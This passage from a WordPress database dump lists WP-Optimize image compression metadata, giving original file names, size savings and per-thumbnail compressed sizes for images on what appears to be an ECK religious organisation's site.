WP-Optimize'),(164569,248166,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:41817;s:12:\"smushed-size\";i:32436;s:15:\"savings-percent\";d:22.42999999999999971578290569595992565155029296875;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:41817;s:10:\"compressed\";i:32436;}s:6:\"medium\";a:2:{s:8:\"original\";i:29752;s:10:\"compressed\";i:27369;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:12624;s:10:\"compressed\";i:11653;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2113;s:10:\"compressed\";i:1697;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:37406;s:10:\"compressed\";i:34390;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:21712;s:10:\"compressed\";i:19992;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:26483;s:10:\"compressed\";i:24426;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:17538;s:10:\"compressed\";i:16206;}}}'),(164570,248434,'original-file','2020/01/wslope-splashpix-FULL-SIZE-updraft-pre-smush-original.jpg'),(164571,248434,'smush-complete','1'),(164572,248434,'smush-info','The file was compressed from 892.11 KB to 827.10 KB saving 7.29 percent using WP-Optimize'),(164573,248434,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:913519;s:12:\"smushed-size\";i:846950;s:15:\"savings-percent\";d:7.29000000000000003552713678800500929355621337890625;s:10:\"sizes-info\";a:18:{s:4:\"full\";a:2:{s:8:\"original\";i:913519;s:10:\"compressed\";i:846950;}s:6:\"medium\";a:2:{s:8:\"original\";i:40386;s:10:\"compressed\";i:36157;}s:5:\"large\";a:2:{s:8:\"original\";i:425146;s:10:\"compressed\";i:379364;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:15626;s:10:\"compressed\";i:13988;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:246082;s:10:\"compressed\";i:219974;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:862771;s:10:\"compressed\";i:769110;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:78340;s:10:\"compressed\";i:70039;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2340;s:10:\"compressed\";i:1910;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:57664;s:10:\"compressed\";i:51702;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:28984;s:10:\"compressed\";i:25988;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:130377;s:10:\"compressed\";i:116631;}s:5:\"wcbig\";a:2:{s:8:\"original\";i:267927;s:10:\"compressed\";i:239519;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:33659;s:10:\"compressed\";i:30053;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:89437;s:10:\"compressed\";i:80143;}s:13:\"wcfixedheight\";a:2:{s:8:\"original\";i:237756;s:10:\"compressed\";i:212497;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:22327;s:10:\"compressed\";i:19961;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:74170;s:10:\"compressed\";i:66315;}s:8:\"wcslider\";a:2:{s:8:\"original\";i:363534;s:10:\"compressed\";i:322181;}}}'),(164574,248630,'original-file','2020/01/wslope-oldmine-sized-3-updraft-pre-smush-original.jpg'),(164575,248630,'smush-complete','1'),(164576,248630,'smush-info','The file was compressed from 46.74 KB to 43.00 KB saving 8 percent using WP-Optimize'),(164577,248630,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:47862;s:12:\"smushed-size\";i:44035;s:15:\"savings-percent\";d:8;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:47862;s:10:\"compressed\";i:44035;}s:6:\"medium\";a:2:{s:8:\"original\";i:40051;s:10:\"compressed\";i:35177;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:17863;s:10:\"compressed\";i:15727;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2675;s:10:\"compressed\";i:2204;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:47301;s:10:\"compressed\";i:38233;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:29764;s:10:\"compressed\";i:26180;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:37042;s:10:\"compressed\";i:32593;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:24767;s:10:\"compressed\";i:21806;}}}'),(164578,248842,'original-file','2020/01/wslope-balloons-sized-3-updraft-pre-smush-original.jpg'),(164579,248842,'smush-complete','1'),(164580,248842,'smush-info','The file was compressed from 38.45 KB to 36.28 KB saving 5.64 percent using WP-Optimize'),(164581,248842,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:39375;s:12:\"smushed-size\";i:37155;s:15:\"savings-percent\";d:5.63999999999999968025576890795491635799407958984375;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:39375;s:10:\"compressed\";i:37155;}s:6:\"medium\";a:2:{s:8:\"original\";i:32135;s:10:\"compressed\";i:28640;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:16071;s:10:\"compressed\";i:14164;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2772;s:10:\"compressed\";i:2270;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:40260;s:10:\"compressed\";i:33262;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:24176;s:10:\"compressed\";i:21557;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:29989;s:10:\"compressed\";i:26755;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:20899;s:10:\"compressed\";i:18561;}}}'),(164582,249746,'original-file','2020/01/Youth-in-ECK-sized-updraft-pre-smush-original.jpg'),(164583,249746,'smush-complete','1'),(164584,249746,'smush-info','The file was compressed from 73.92 KB to 69.97 KB saving 5.33 percent using WP-Optimize'),(164585,249746,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:75689;s:12:\"smushed-size\";i:71653;s:15:\"savings-percent\";d:5.3300000000000000710542735760100185871124267578125;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:75689;s:10:\"compressed\";i:71653;}s:6:\"medium\";a:2:{s:8:\"original\";i:37098;s:10:\"compressed\";i:32620;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:17576;s:10:\"compressed\";i:15462;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:65937;s:10:\"compressed\";i:58324;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2838;s:10:\"compressed\";i:2324;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:51379;s:10:\"compressed\";i:45386;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:27634;s:10:\"compressed\";i:24415;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:91843;s:10:\"compressed\";i:81477;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:37961;s:10:\"compressed\";i:33439;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:82217;s:10:\"compressed\";i:72972;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:24115;s:10:\"compressed\";i:21266;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:64663;s:10:\"compressed\";i:57107;}}}'),(164586,251919,'original-file','2020/01/wisdom-of-the-heart-book-2-updraft-pre-smush-original.jpg'),(164587,251919,'smush-complete','1'),(164588,251919,'smush-info','The file was compressed from 11.11 KB to 10.45 KB saving 5.92 percent using WP-Optimize'),(164589,251919,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:11377;s:12:\"smushed-size\";i:10703;s:15:\"savings-percent\";d:5.9199999999999999289457264239899814128875732421875;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:11377;s:10:\"compressed\";i:10703;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10245;s:10:\"compressed\";i:9193;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2331;s:10:\"compressed\";i:1850;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:11308;s:10:\"compressed\";i:10013;}}}'),(164590,252359,'original-file','2020/01/cosprings-member-cal-promo-updraft-pre-smush-original.jpg'),(164591,252359,'smush-complete','1'),(164592,252359,'smush-info','The file was compressed from 41.54 KB to 38.85 KB saving 6.48 percent using WP-Optimize'),(164593,252359,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:42536;s:12:\"smushed-size\";i:39778;s:15:\"savings-percent\";d:6.480000000000000426325641456060111522674560546875;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:42536;s:10:\"compressed\";i:39778;}s:6:\"medium\";a:2:{s:8:\"original\";i:31847;s:10:\"compressed\";i:27994;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:15279;s:10:\"compressed\";i:13384;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2571;s:10:\"compressed\";i:2097;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:40608;s:10:\"compressed\";i:36119;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:23764;s:10:\"compressed\";i:20910;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:35114;s:10:\"compressed\";i:30918;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:21088;s:10:\"compressed\";i:18529;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:54974;s:10:\"compressed\";i:48825;}}}'),(164594,252360,'original-file','2020/01/loveland-member-cal-promo-updraft-pre-smush-original.jpg'),(164595,252360,'smush-complete','1'),(164596,252360,'smush-info','The file was compressed from 30.18 KB to 28.82 KB saving 4.52 percent using WP-Optimize'),(164597,252360,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:30905;s:12:\"smushed-size\";i:29508;s:15:\"savings-percent\";d:4.519999999999999573674358543939888477325439453125;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:30905;s:10:\"compressed\";i:29508;}s:6:\"medium\";a:2:{s:8:\"original\";i:23807;s:10:\"compressed\";i:21716;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11444;s:10:\"compressed\";i:10445;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2008;s:10:\"compressed\";i:1610;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:30638;s:10:\"compressed\";i:28320;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:17774;s:10:\"compressed\";i:16211;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:26335;s:10:\"compressed\";i:23986;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:15709;s:10:\"compressed\";i:14365;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:41450;s:10:\"compressed\";i:38111;}}}'),(164598,253423,'original-file','2020/01/westslope-bkgnd-image-updraft-pre-smush-original.jpg'),(164599,253423,'smush-complete','1'),(164600,253423,'smush-info','The file was compressed from 221.49 KB to 195.79 KB saving 11.6 percent using WP-Optimize'),(164601,253423,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:226802;s:12:\"smushed-size\";i:200494;s:15:\"savings-percent\";d:11.5999999999999996447286321199499070644378662109375;s:10:\"sizes-info\";a:18:{s:4:\"full\";a:2:{s:8:\"original\";i:226802;s:10:\"compressed\";i:200494;}s:6:\"medium\";a:2:{s:8:\"original\";i:14015;s:10:\"compressed\";i:13260;}s:5:\"large\";a:2:{s:8:\"original\";i:144250;s:10:\"compressed\";i:133751;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:7075;s:10:\"compressed\";i:6638;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:77807;s:10:\"compressed\";i:72337;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:320959;s:10:\"compressed\";i:304183;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:27480;s:10:\"compressed\";i:26035;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1546;s:10:\"compressed\";i:1172;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:22636;s:10:\"compressed\";i:21351;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:10356;s:10:\"compressed\";i:9800;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:39433;s:10:\"compressed\";i:37290;}s:5:\"wcbig\";a:2:{s:8:\"original\";i:94619;s:10:\"compressed\";i:87058;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:15567;s:10:\"compressed\";i:14733;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:37875;s:10:\"compressed\";i:35812;}s:13:\"wcfixedheight\";a:2:{s:8:\"original\";i:108814;s:10:\"compressed\";i:100649;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:9484;s:10:\"compressed\";i:9002;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:27017;s:10:\"compressed\";i:25606;}s:8:\"wcslider\";a:2:{s:8:\"original\";i:143378;s:10:\"compressed\";i:132660;}}}'),(164602,254444,'original-file','2020/01/hu-sos-bgrid-sized-updraft-pre-smush-original.png'),(164603,254444,'smush-complete','1'),(164604,254444,'smush-info','The file was compressed from 62.02 KB to 19.69 KB saving 68.25 percent using WP-Optimize'),(164605,254444,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:63512;s:12:\"smushed-size\";i:20165;s:15:\"savings-percent\";d:68.25;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:63512;s:10:\"compressed\";i:20165;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:40629;s:10:\"compressed\";i:13685;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:5856;s:10:\"compressed\";i:3004;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:56041;s:10:\"compressed\";i:18563;}}}'),(164606,254554,'original-file','2020/01/a-modern-prophet-answers-your-questions-book-1-updraft-pre-smush-original.jpg'),(164607,254554,'smush-complete','1'),(164608,254554,'smush-info','The file was compressed from 13.66 KB to 12.98 KB saving 4.97 percent using WP-Optimize'),(164609,254554,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:13991;s:12:\"smushed-size\";i:13296;s:15:\"savings-percent\";d:4.96999999999999975131004248396493494510650634765625;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:13991;s:10:\"compressed\";i:13296;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:12826;s:10:\"compressed\";i:11638;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2079;s:10:\"compressed\";i:1666;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:12248;s:10:\"compressed\";i:11152;}}}'),(164610,254555,'original-file','2020/01/a-modern-prophet-answers-your-questions-book-2-updraft-pre-smush-original.jpg'),(164611,254555,'smush-complete','1'),(164612,254555,'smush-info','The file was compressed from 12.59 KB to 11.84 KB saving 5.96 percent using WP-Optimize'),(164613,254555,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:12893;s:12:\"smushed-size\";i:12125;s:15:\"savings-percent\";d:5.95999999999999996447286321199499070644378662109375;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:12893;s:10:\"compressed\";i:12125;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11766;s:10:\"compressed\";i:10649;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1941;s:10:\"compressed\";i:1544;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:11119;s:10:\"compressed\";i:10067;}}}'),(164614,254556,'original-file','2020/01/animals-are-soul-too-updraft-pre-smush-original.jpg'),(164615,254556,'smush-complete','1'),(164616,254556,'smush-info','The file was compressed from 570.85 KB to 20.02 KB saving 96.49 percent using WP-Optimize'),(164617,254556,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:584547;s:12:\"smushed-size\";i:20496;s:15:\"savings-percent\";d:96.4899999999999948840923025272786617279052734375;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:584547;s:10:\"compressed\";i:20496;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:12457;s:10:\"compressed\";i:11154;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2395;s:10:\"compressed\";i:1941;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:11876;s:10:\"compressed\";i:10532;}}}'),(164618,254557,'original-file','2020/01/art-of-spiritual-dreaming-updraft-pre-smush-original.jpg'),(164619,254557,'smush-complete','1'),(164620,254557,'smush-info','The file was compressed from 16.82 KB to 12.95 KB saving 22.97 percent using WP-Optimize'),(164621,254557,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:17221;s:12:\"smushed-size\";i:13265;s:15:\"savings-percent\";d:22.969999999999998863131622783839702606201171875;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:17221;s:10:\"compressed\";i:13265;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:14372;s:10:\"compressed\";i:12927;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2377;s:10:\"compressed\";i:1935;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:13244;s:10:\"compressed\";i:11873;}}}'),(164622,254558,'original-file','2020/01/ask-the-master-book-1-updraft-pre-smush-original.jpg'),(164623,254558,'smush-complete','1'),(164624,254558,'smush-info','The file was compressed from 12.52 KB to 12.01 KB saving 4.09 percent using WP-Optimize'),(164625,254558,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:12823;s:12:\"smushed-size\";i:12299;s:15:\"savings-percent\";d:4.089999999999999857891452847979962825775146484375;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:12823;s:10:\"compressed\";i:12299;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11026;s:10:\"compressed\";i:10090;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2302;s:10:\"compressed\";i:1852;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:11744;s:10:\"compressed\";i:10591;}}}'),(164626,254559,'original-file','2020/01/ask-the-master-book-2-updraft-pre-smush-original.jpg'),(164627,254559,'smush-complete','1'),(164628,254559,'smush-info','The file was compressed from 10.05 KB to 9.71 KB saving 3.47 percent using WP-Optimize'),(164629,254559,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:10295;s:12:\"smushed-size\";i:9938;s:15:\"savings-percent\";d:3.470000000000000195399252334027551114559173583984375;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:10295;s:10:\"compressed\";i:9938;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8382;s:10:\"compressed\";i:7747;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2011;s:10:\"compressed\";i:1587;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:9635;s:10:\"compressed\";i:8963;}}}'),(164630,254560,'original-file','2020/01/book-of-ECK-parables-book-1-updraft-pre-smush-original.jpg'),(164631,254560,'smush-complete','1'),(164632,254560,'smush-info','The file was compressed from 11.73 KB to 11.19 KB saving 4.6 percent using WP-Optimize'),(164633,254560,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:12014;s:12:\"smushed-size\";i:11461;s:15:\"savings-percent\";d:4.5999999999999996447286321199499070644378662109375;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:12014;s:10:\"compressed\";i:11461;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11097;s:10:\"compressed\";i:10210;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2098;s:10:\"compressed\";i:1698;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:10846;s:10:\"compressed\";i:9959;}}}'),(164634,254561,'original-file','2020/01/book-of-ECK-parables-book-2-updraft-pre-smush-original.jpg'),(164635,254561,'smush-complete','1'),(164636,254561,'smush-info','The file was compressed from 11.44 KB to 10.90 KB saving 4.67 percent using WP-Optimize'),(164637,254561,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:11712;s:12:\"smushed-size\";i:11165;s:15:\"savings-percent\";d:4.6699999999999999289457264239899814128875732421875;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:11712;s:10:\"compressed\";i:11165;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10676;s:10:\"compressed\";i:9845;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2037;s:10:\"compressed\";i:1634;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:10573;s:10:\"compressed\";i:9712;}}}'),(164638,254562,'original-file','2020/01/book-of-ECK-parables-book-3-updraft-pre-smush-original.jpg'),(164639,254562,'smush-complete','1'),(164640,254562,'smush-info','The file was compressed from 11.82 KB to 11.25 KB saving 4.79 percent using WP-Optimize'),(164641,254562,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:12099;s:12:\"smushed-size\";i:11520;s:15:\"savings-percent\";d:4.79000000000000003552713678800500929355621337890625;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:12099;s:10:\"compressed\";i:11520;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11400;s:10:\"compressed\";i:10510;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2099;s:10:\"compressed\";i:1703;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:10849;s:10:\"compressed\";i:9957;}}}'),(164642,254563,'original-file','2020/01/eck-essentials-updraft-pre-smush-original.jpg'),(164643,254563,'smush-complete','1'),(164644,254563,'smush-info','The file was compressed from 12.51 KB to 11.90 KB saving 4.9 percent using WP-Optimize'),(164645,254563,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:12809;s:12:\"smushed-size\";i:12181;s:15:\"savings-percent\";d:4.9000000000000003552713678800500929355621337890625;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:12809;s:10:\"compressed\";i:12181;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11955;s:10:\"compressed\";i:10880;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2453;s:10:\"compressed\";i:2004;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:11697;s:10:\"compressed\";i:10624;}}}'),(164646,254564,'original-file','2020/01/how-the-inner-master-works-updraft-pre-smush-original.jpg'),(164647,254564,'smush-complete','1'),(164648,254564,'smush-info','The file was compressed from 14.55 KB to 13.61 KB saving 6.46 percent using WP-Optimize'),(164649,254564,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:14903;s:12:\"smushed-size\";i:13940;s:15:\"savings-percent\";d:6.45999999999999996447286321199499070644378662109375;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:14903;s:10:\"compressed\";i:13940;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:12385;s:10:\"compressed\";i:11428;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2152;s:10:\"compressed\";i:1730;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:11331;s:10:\"compressed\";i:10373;}}}'),(164650,254565,'original-file','2020/01/how-to-find-god-updraft-pre-smush-original.jpg'),(164651,254565,'smush-complete','1'),(164652,254565,'smush-info','The file was compressed from 14.94 KB to 11.32 KB saving 24.25 percent using WP-Optimize'),(164653,254565,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:15297;s:12:\"smushed-size\";i:11587;s:15:\"savings-percent\";d:24.25;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:15297;s:10:\"compressed\";i:11587;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:12155;s:10:\"compressed\";i:11111;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2205;s:10:\"compressed\";i:1742;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:11142;s:10:\"compressed\";i:10125;}}}'),(164654,254566,'original-file','2020/01/how-to-survive-spiritually-updraft-pre-smush-original.jpg'),(164655,254566,'smush-complete','1'),(164656,254566,'smush-info','The file was compressed from 18.58 KB to 17.40 KB saving 6.39 percent using WP-Optimize'),(164657,254566,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:19029;s:12:\"smushed-size\";i:17813;s:15:\"savings-percent\";d:6.38999999999999968025576890795491635799407958984375;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:19029;s:10:\"compressed\";i:17813;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:17010;s:10:\"compressed\";i:15150;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2611;s:10:\"compressed\";i:2112;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:15829;s:10:\"compressed\";i:14074;}}}'),(164658,254567,'original-file','2020/01/hu-most-beautiful-prayer-updraft-pre-smush-original.jpg'),(164659,254567,'smush-complete','1'),(164660,254567,'smush-info','The file was compressed from 11.56 KB to 11.14 KB saving 3.61 percent using WP-Optimize'),(164661,254567,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:11834;s:12:\"smushed-size\";i:11407;s:15:\"savings-percent\";d:3.609999999999999875655021241982467472553253173828125;s:10:\"sizes-info\";a:5:{s:4:\"full\";a:2:{s:8:\"original\";i:11834;s:10:\"compressed\";i:11407;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10189;s:10:\"compressed\";i:9533;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2098;s:10:\"compressed\";i:1660;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:11594;s:10:\"compressed\";i:10711;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:11192;s:10:\"compressed\";i:10330;}}}'),(164662,254568,'original-file','2020/01/past-lives-dreams-and-soul-travel-updraft-pre-smush-original.jpg'),(164663,254568,'smush-complete','1'),(164664,254568,'smush-info','The file was compressed from 14.58 KB to 13.77 KB saving 5.54 percent using WP-Optimize'),(164665,254568,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:14930;s:12:\"smushed-size\";i:14103;s:15:\"savings-percent\";d:5.54000000000000003552713678800500929355621337890625;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:14930;s:10:\"compressed\";i:14103;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:12401;s:10:\"compressed\";i:11254;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2308;s:10:\"compressed\";i:1872;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:12563;s:10:\"compressed\";i:11343;}}}'),(164666,254569,'original-file','2020/01/road-to-spiritual-freedom-updraft-pre-smush-original.jpg'),(164667,254569,'smush-complete','1'),(164668,254569,'smush-info','The file was compressed from 14.49 KB to 13.59 KB saving 6.21 percent using WP-Optimize'),(164669,254569,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:14834;s:12:\"smushed-size\";i:13913;s:15:\"savings-percent\";d:6.20999999999999996447286321199499070644378662109375;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:14834;s:10:\"compressed\";i:13913;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:13369;s:10:\"compressed\";i:12320;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2157;s:10:\"compressed\";i:1760;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:11872;s:10:\"compressed\";i:10853;}}}'),(164670,254570,'original-file','2020/01/spiritual-exercises-of-eck-updraft-pre-smush-original.jpg'),(164671,254570,'smush-complete','1'),(164672,254570,'smush-info','The file was compressed from 13.96 KB to 13.25 KB saving 5.08 percent using 